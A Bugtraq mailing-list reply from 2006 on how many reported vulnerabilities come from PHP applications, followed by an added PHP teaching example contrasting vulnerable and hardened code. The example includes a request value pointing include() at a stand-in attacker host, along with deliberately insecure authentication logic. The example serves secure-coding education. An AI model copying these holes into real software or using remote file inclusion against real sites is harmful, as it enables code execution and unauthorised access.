Bugtraq mailing list archives
Re: PHP security (or the lack thereof)
From: "Steven M. Christey" <coley () mitre org>
Date: Fri, 16 Jun 2006 19:25:22 -0400 (EDT)
Darren Reed said:
> From my own mail archives, PHP appears to make up at least 4% of the email to bugtraq I see - or over 1000 issues since 1995, out of the 25,000 I have saved.
Do you mean the PHP interpreter? Or applications written in PHP? I'm not sure how many vulnerabilities were in the PHP interpreter itself, but it looks like it's about 150 or so. Applications that are WRITTEN in PHP, however, probably cover 20% or more of all reported vulns this year. This is just a hunch - I don't have any way of proving this. Most PHP apps don't have "php" in their name, and I don't know of a vulnerability database that records which programming language was used for an application. But the rest of your email matches on "php" were probably PHP applications.
> People complain about applications like sendmail... in the same period, it has been responsible for less than 200.
It's more appropriate to compare the PHP language to the C language, or to compare Sendmail to various high-profile PHP applications.
> Do we have a new contender for worst security offender ever written?
Over the years, the PHP language has made it very easy for inexperienced application programmers to shoot themselves in the foot, and it has features that even experienced programmers might not know to defend against. Sounds kinda like C, doesn't it? One thing with PHP though, you don't need much training before you can put together a usable program. Powerful features plus lots of non-expert programmers equals a lot of vulnerabilities, regardless of the language.

PHP is slowly removing the most dangerous features, or at least not enabling them by default.

I suspect that a large percentage of vulnerabilities could be fixed with programming languages with built-in security considerations, and an API that makes it easy or transparent to do safer programming.

- Steve

=======================================================================
Disclaimer: this document was publicly posted to foster timely technical exchange. It may contain errors or omissions. The views and opinions being expressed are those of Steve Christey and do not necessarily reflect the views of The MITRE Corporation. Members of the press are requested to contact me directly before quoting any statements in this document.
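The kind of language-level foot-gun the message above alludes to, shown as an added example that is not part of Steve Christey's post and not PHP project code. The post names no specific feature, so the choice of register_globals and URL-based include() as the illustration, the constructed request parameters (authorized, page), and every function name are this example's own assumptions; both features are historically accurate as described in the comments.

```php
<?php
declare(strict_types=1);

// Added illustration, not code from the post. Simulates two PHP behaviours
// that the language later turned off by default: register_globals (off by
// default since PHP 4.2.0, removed in 5.4.0) and include() of a URL
// (governed by allow_url_include, off by default since PHP 5.2.0).
// Run from the CLI: php footgun.php

// Constructed request data standing in for a real HTTP request; the
// parameter names "authorized" and "page" are this example's own.
$request = [
    'user'       => 'alice',
    'pass'       => 'wrong-password',
    'authorized' => '1',                                // attacker-added parameter
    'page'       => 'http://attacker.example/evil.txt', // attacker-chosen include
];

// Mimic register_globals: every request parameter becomes a global variable.
function simulate_register_globals(array $request): void
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Constructed credential check that always fails, so any "ADMIN" result
// below comes from the foot-gun, not from valid credentials.
function check_password(string $user, string $pass): bool
{
    return false;
}

// --- Vulnerable: the flag is only ever set on success and never
// initialised. Under register_globals, ?authorized=1 has already created
// the global $authorized before this function runs.
function vulnerable_auth(array $request): bool
{
    global $authorized;
    if (check_password($request['user'], $request['pass'])) {
        $authorized = true;
    }
    return (bool) $authorized;
}

// --- Hardened: a local, always-initialised flag; request data is read
// only from the request array, never from a bare variable.
function hardened_auth(array $request): bool
{
    $authorized = false;
    if (check_password($request['user'], $request['pass'])) {
        $authorized = true;
    }
    return $authorized;
}

// --- Vulnerable: a raw request value decides what gets included. With
// allow_url_include=On this would fetch and execute remote code; with it
// off, traversal to local files remains. Returned, not passed to include(),
// so the example stays safe to run.
function vulnerable_include_target(array $request): string
{
    return $request['page'];
}

// --- Hardened: the request selects a key in a fixed allow-list; anything
// else is rejected, so no attacker-controlled string reaches include().
function hardened_include_target(array $request): ?string
{
    $pages = [
        'home'  => __DIR__ . '/pages/home.php',
        'about' => __DIR__ . '/pages/about.php',
    ];
    return $pages[$request['page']] ?? null;
}

simulate_register_globals($request);
printf("vulnerable_auth:   %s\n", vulnerable_auth($request) ? 'ADMIN' : 'denied');
printf("hardened_auth:     %s\n", hardened_auth($request) ? 'ADMIN' : 'denied');
printf("vulnerable target: %s\n", vulnerable_include_target($request));
printf("hardened target:   %s\n", hardened_include_target($request) ?? '(rejected)');
```

With register_globals simulated, vulnerable_auth() grants access despite the wrong password, because the attacker-supplied authorized=1 parameter pre-populated the flag the code never initialised; hardened_auth() denies it. The allow-list variant maps the request value to a fixed path or rejects it, which is the shape of the fix whether or not allow_url_include is on.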